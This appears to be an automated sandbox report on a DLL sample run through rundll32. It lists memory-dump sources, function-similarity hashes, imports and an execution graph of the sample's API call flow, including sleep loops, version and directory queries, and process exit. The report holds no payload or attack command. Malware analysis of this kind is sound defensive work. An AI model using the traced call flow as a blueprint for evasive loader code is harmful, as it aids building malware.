                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                                                                                          • API String ID: 0-974437099
                                                                                                                                                                          • Opcode ID: 9ad28d4d323b674a2e2dcd1cd8893c3567945a917d25b34cad8fe9ba4ef76f9f
                                                                                                                                                                          • Instruction ID: 332497999dc6db8bd7d5c1b3476d49a9780cdf6b5e80ca64d9d5470ff6f69c52
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ad28d4d323b674a2e2dcd1cd8893c3567945a917d25b34cad8fe9ba4ef76f9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 5571DFB1944200DFDB10CF68D48865EB7F9BF46310F878159D96ADB396EF30A940CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lpeg_set_defaults.DISTANTLY.DAT ref: 6AD94CB3
                                                                                                                                                                          • lpeg_set_colorspace.DISTANTLY.DAT ref: 6AD94CC6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lpeg_set_colorspace.lpeg_set_defaults.
                                                                                                                                                                          • String ID: T$T
                                                                                                                                                                          • API String ID: 1532395714-152709941
                                                                                                                                                                          • Opcode ID: 3b097d9bb3a82a5aac6b579832da24ad101eb866f4ef5c8b9f12fe72cd779cae
                                                                                                                                                                          • Instruction ID: 5669d77f0196abb09541f12b065b06d54c790ed7272d93d1eff1252bf0283afc
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b097d9bb3a82a5aac6b579832da24ad101eb866f4ef5c8b9f12fe72cd779cae
                                                                                                                                                                          • Instruction Fuzzy Hash: 839107B8608350CFC744CF28C084A66BBF0BF99304F5649A9E9998B366D735E945CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Address %p has no image-section, xrefs: 6ADC4F2B
                                                                                                                                                                          • VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: QueryVirtual$memcpy
                                                                                                                                                                          • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                          • API String ID: 2264504374-157664173
                                                                                                                                                                          • Opcode ID: 24111475d2224d49a3310be673771e99438ce2be4a556ea7fae8b5e7b6f244b6
                                                                                                                                                                          • Instruction ID: d2aee75258144a234741a529dde6d5742a97a54de560bdcf7392abec5c5a9d56
                                                                                                                                                                          • Opcode Fuzzy Hash: 24111475d2224d49a3310be673771e99438ce2be4a556ea7fae8b5e7b6f244b6
                                                                                                                                                                          • Instruction Fuzzy Hash: 9331FBB15053019FD710DF19E58460ABBF9AF85748F86886DE889CB311F730D984CB93
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • linit_memory_mgr.DISTANTLY.DAT ref: 6AD94FEB
                                                                                                                                                                          • linit_marker_reader.DISTANTLY.DAT ref: 6AD95083
                                                                                                                                                                          • linit_input_controller.DISTANTLY.DAT ref: 6AD9508B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: linit_input_controller.linit_marker_reader.linit_memory_mgr.
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 3467899730-2852464175
                                                                                                                                                                          • Opcode ID: e25c2bec6530310f2659e09cd0d69c14425e1d784dba9eb933eba84cabbe6607
                                                                                                                                                                          • Instruction ID: df7413b6ea11ebe831d52a07390beabf7ab4cec8b17e4933af665bc9dc0eef73
                                                                                                                                                                          • Opcode Fuzzy Hash: e25c2bec6530310f2659e09cd0d69c14425e1d784dba9eb933eba84cabbe6607
                                                                                                                                                                          • Instruction Fuzzy Hash: 3D5127B1504341CFEB409F24C49A7477FA2EF45308F5A85A8DC494F39AC7BAC449CBA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                          • String ID: __deregister_frame_info$pIqt
                                                                                                                                                                          • API String ID: 3013587201-1032916518
                                                                                                                                                                          • Opcode ID: 98d4011d7fc9e54ddd4b5fa66f294f1959cac8d665bc0da1b81202120f2b0d71
                                                                                                                                                                          • Instruction ID: 782b1e555356ceae5262b15ddc5d94d78428f7c5180b692fe35614374b348a05
                                                                                                                                                                          • Opcode Fuzzy Hash: 98d4011d7fc9e54ddd4b5fa66f294f1959cac8d665bc0da1b81202120f2b0d71
                                                                                                                                                                          • Instruction Fuzzy Hash: C5E0C7B1504600DBEB007F79A5463277BF47B41205F42455CE462D7244EA34E809D7D3
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fd3e345aa76fe7250c9036806b672ebe074b997cb9e74fd6c3123059f4960f31
                                                                                                                                                                          • Instruction ID: 5c82de6ab288bc658a6ef02309b5ebd056ff84ab922924b4ce3d6def8c7b3fb9
                                                                                                                                                                          • Opcode Fuzzy Hash: fd3e345aa76fe7250c9036806b672ebe074b997cb9e74fd6c3123059f4960f31
                                                                                                                                                                          • Instruction Fuzzy Hash: 22D16975A48241DFD718CF28C055B627BF2BF8A300F4784A9D8898F3A2DB74E941CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6AD95C66
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT ref: 6AD95CA0
                                                                                                                                                                          • ldiv_round_up.DISTANTLY.DAT(?), ref: 6AD95CEC
                                                                                                                                                                          • linit_upsampler.DISTANTLY.DAT ref: 6AD95D10
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ldiv_round_up.$linit_upsampler.
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3316262639-0
                                                                                                                                                                          • Opcode ID: da5f2f2cfea2b43639568c02a8941e52612899b1af8d8b2027a139d06db0dbe5
                                                                                                                                                                          • Instruction ID: 80434f9f3f5ae4dd28d118be5abef8e07339e7408c6cf9c5450425bc7d23256c
                                                                                                                                                                          • Opcode Fuzzy Hash: da5f2f2cfea2b43639568c02a8941e52612899b1af8d8b2027a139d06db0dbe5
                                                                                                                                                                          • Instruction Fuzzy Hash: 03513774609701DFDB58DF28C1C4A5ABBE1FF89704F1688ADE9898B315DB30E845CB52
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 209411981-0
                                                                                                                                                                          • Opcode ID: 60430c18888137938619c58bf4cf444f392e00b3fe098dbbed665fd4bea5b62c
                                                                                                                                                                          • Instruction ID: 983c72dcd00ff6fc5be3ffad00703c7a34335f25066d8c37b53ed1931195674b
                                                                                                                                                                          • Opcode Fuzzy Hash: 60430c18888137938619c58bf4cf444f392e00b3fe098dbbed665fd4bea5b62c
                                                                                                                                                                          • Instruction Fuzzy Hash: B211A4F49093008FDB40EFB9D58851EBBF4BB59214F43596DE8C5C7351EB3495848BA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • lpeg_write_tables.DISTANTLY.DAT ref: 6AD8238C
                                                                                                                                                                            • Part of subcall function 6ADADEB0: memset.MSVCRT ref: 6ADADECA
                                                                                                                                                                          • lpeg_write_tables.DISTANTLY.DAT ref: 6AD8246F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lpeg_write_tables.$memset
                                                                                                                                                                          • String ID: T
                                                                                                                                                                          • API String ID: 3419197268-3187964512
                                                                                                                                                                          • Opcode ID: 16579e418b7114580a242a58749bf80d80c295ca353e253c30fca1e3a5a70d42
                                                                                                                                                                          • Instruction ID: 4fdc3ac01e3d65ca0392028ace5de360d9fe5c146245f42c22aeaaf228dc7a27
                                                                                                                                                                          • Opcode Fuzzy Hash: 16579e418b7114580a242a58749bf80d80c295ca353e253c30fca1e3a5a70d42
                                                                                                                                                                          • Instruction Fuzzy Hash: 7781B2B56097419FC354CF29C584A0AFBF1BF88768F468A6EF99997310DB30E941CB42
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lround_up.
                                                                                                                                                                          • String ID: x
                                                                                                                                                                          • API String ID: 762205329-2363233923
                                                                                                                                                                          • Opcode ID: 5e94dd32af8b4527e4628fc4a1b9cd76541ce9f8ce4fd41565f4bd195313e53a
                                                                                                                                                                          • Instruction ID: 29a580eb566f46f941f2f6de73a124049dd45205d8d3f5828e3b15dd7f315306
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e94dd32af8b4527e4628fc4a1b9cd76541ce9f8ce4fd41565f4bd195313e53a
                                                                                                                                                                          • Instruction Fuzzy Hash: 125191B45053009FD740DF19C184A9ABBE1BF88708F16C9AEE88D8B316D776E946CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.565622867.000000006AD81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6AD80000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.565617607.000000006AD80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADC7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565680610.000000006ADEA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565711351.000000006ADF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565719265.000000006ADF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADF7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.565731324.000000006ADFA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6ad80000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lround_up.
                                                                                                                                                                          • String ID: h
                                                                                                                                                                          • API String ID: 762205329-2439710439
                                                                                                                                                                          • Opcode ID: f0bac1e6647a227ab9b6bef3a51b905cbed0bd53569b212af88ee7eb17eeadaa
                                                                                                                                                                          • Instruction ID: 1fba1324890fa87e8d68035a9d94754a5a3668e32579de7705a16ff4a65a52c2
                                                                                                                                                                          • Opcode Fuzzy Hash: f0bac1e6647a227ab9b6bef3a51b905cbed0bd53569b212af88ee7eb17eeadaa
                                                                                                                                                                          • Instruction Fuzzy Hash: 5641C5B99057009FC350CF15C184A9AFBF0FF88714F068AAEE8998B711D775A955CF82
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.7%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:5.7%
                                                                                                                                                                          Total number of Nodes:1461
                                                                                                                                                                          Total number of Limit Nodes:8
                                                                                                                                                                          execution_graph 11646 10001000 11649 10001494 11646->11649 11673 100015d4 11649->11673 11653 100014a4 11697 10009203 11653->11697 11657 10001005 ExitProcess 11658 100014c9 11658->11657 11659 100014fa CoInitializeEx 11658->11659 11660 10001569 11658->11660 11772 100099ec 11659->11772 11662 10001597 11660->11662 11750 1000a771 11660->11750 11662->11657 11665 100015c5 11662->11665 11785 100029dd 11662->11785 11665->11657 11795 100012f8 11665->11795 11669 10001525 11670 10001560 11669->11670 11671 10001553 Sleep 11669->11671 11781 10009e2e 11670->11781 11671->11669 11823 10009559 11673->11823 11676 10009559 8 API calls 11677 10001601 11676->11677 11678 10009559 8 API calls 11677->11678 11679 1000161a 11678->11679 11680 10009559 8 API calls 11679->11680 11681 10001633 11680->11681 11682 10009559 8 API calls 11681->11682 11683 1000164c 11682->11683 11684 10009559 8 API calls 11683->11684 11685 10001667 11684->11685 11686 10009559 8 API calls 11685->11686 11687 10001680 11686->11687 11688 10009559 8 API calls 11687->11688 11689 10001699 11688->11689 11690 10009559 8 API calls 11689->11690 11691 100016b2 11690->11691 11692 10009559 8 API calls 11691->11692 11693 1000149d 11692->11693 11694 100091e7 11693->11694 11695 100091f3 11694->11695 11696 100091f5 RtlAllocateHeap 11694->11696 11695->11653 11696->11653 11698 100014c3 11697->11698 11699 1000920d 11697->11699 11702 1000bc31 11698->11702 11699->11698 11857 1000936a 11699->11857 11703 100091e7 RtlAllocateHeap 11702->11703 11704 1000bc4c 11703->11704 11705 1000bc57 GetCurrentProcessId 11704->11705 11749 1000bfcf 11704->11749 11706 1000bc6f 11705->11706 11860 1000dd17 11706->11860 11708 1000bcd3 11876 1000e68a 11708->11876 11709 1000bcc2 11709->11708 11867 1000dd67 11709->11867 11714 1000bd08 11715 1000bd52 GetLastError 11714->11715 11716 1000bd58 11714->11716 11715->11716 11717 1000bd81 11716->11717 11718 1000bd8a 11716->11718 11951 1000bc04 11717->11951 11885 1000bb3a 11718->11885 11721 1000bd88 11889 1000d214 11721->11889 11727 1000bddd 11906 1000d22a 11727->11906 11732 1000936a memset 11733 1000be34 GetVersionExA 11732->11733 11925 1000b93e 11733->11925 11737 1000be52 GetWindowsDirectoryW 11931 100091b2 11737->11931 11740 10009e2e 2 API calls 11741 1000beaf 11740->11741 11743 1000bee7 11741->11743 11955 1000c172 11741->11955 11934 10014ae0 11743->11934 11749->11658 11751 1000a78f 11750->11751 11752 1000a7b2 lstrlenW 11751->11752 12055 1000a650 11752->12055 11755 1000a802 12063 1000a41e 11755->12063 11757 1000a7cd 11757->11757 11759 1000a7f1 lstrlenW 11757->11759 11758 1000a8e7 12103 1000a455 11758->12103 11761 1000a90c 11759->11761 11761->11662 11762 1000a8ec 11763 1000a902 11762->11763 11765 10009203 2 API calls 11762->11765 11766 10009203 2 API calls 11763->11766 11764 1000936a memset 11770 1000a807 11764->11770 11765->11762 11766->11761 11770->11758 11770->11764 12068 1000cb78 11770->12068 12073 1000a93e 11770->12073 12082 1000aa38 11770->12082 12089 1000e23e 11770->12089 11774 100099fe 11772->11774 11773 100091e7 RtlAllocateHeap 11775 10009a1d 11773->11775 11774->11773 11776 1000151c 11775->11776 11777 10009a29 lstrcatW 11775->11777 11778 100016ec 11776->11778 11777->11775 11779 10009d63 2 API calls 11778->11779 11780 10001707 11779->11780 11780->11669 11782 10009e44 11781->11782 11783 10009e3c 11781->11783 11782->11660 11784 10009203 2 API calls 11783->11784 11784->11782 11786 100091e7 RtlAllocateHeap 11785->11786 11787 100029e4 11786->11787 11788 10002a3f 11787->11788 11789 100091e7 RtlAllocateHeap 11787->11789 11788->11665 11790 100029f5 11789->11790 11790->11788 11791 100096f3 2 API calls 11790->11791 11792 10002a1b 11791->11792 11793 10002a43 11792->11793 11794 10002a39 GetLastError 11792->11794 11793->11665 11794->11788 11796 10009192 2 API calls 11795->11796 11797 10001308 SetCurrentDirectoryA 11796->11797 11798 10009e14 2 API calls 11797->11798 11799 1000131c 11798->11799 12184 1000aae0 11799->12184 11802 10001326 11802->11657 11804 10001330 12204 10002748 11804->12204 11809 10001393 12239 10001192 11809->12239 11810 10001344 11811 10001349 11810->11811 11812 10001398 11810->11812 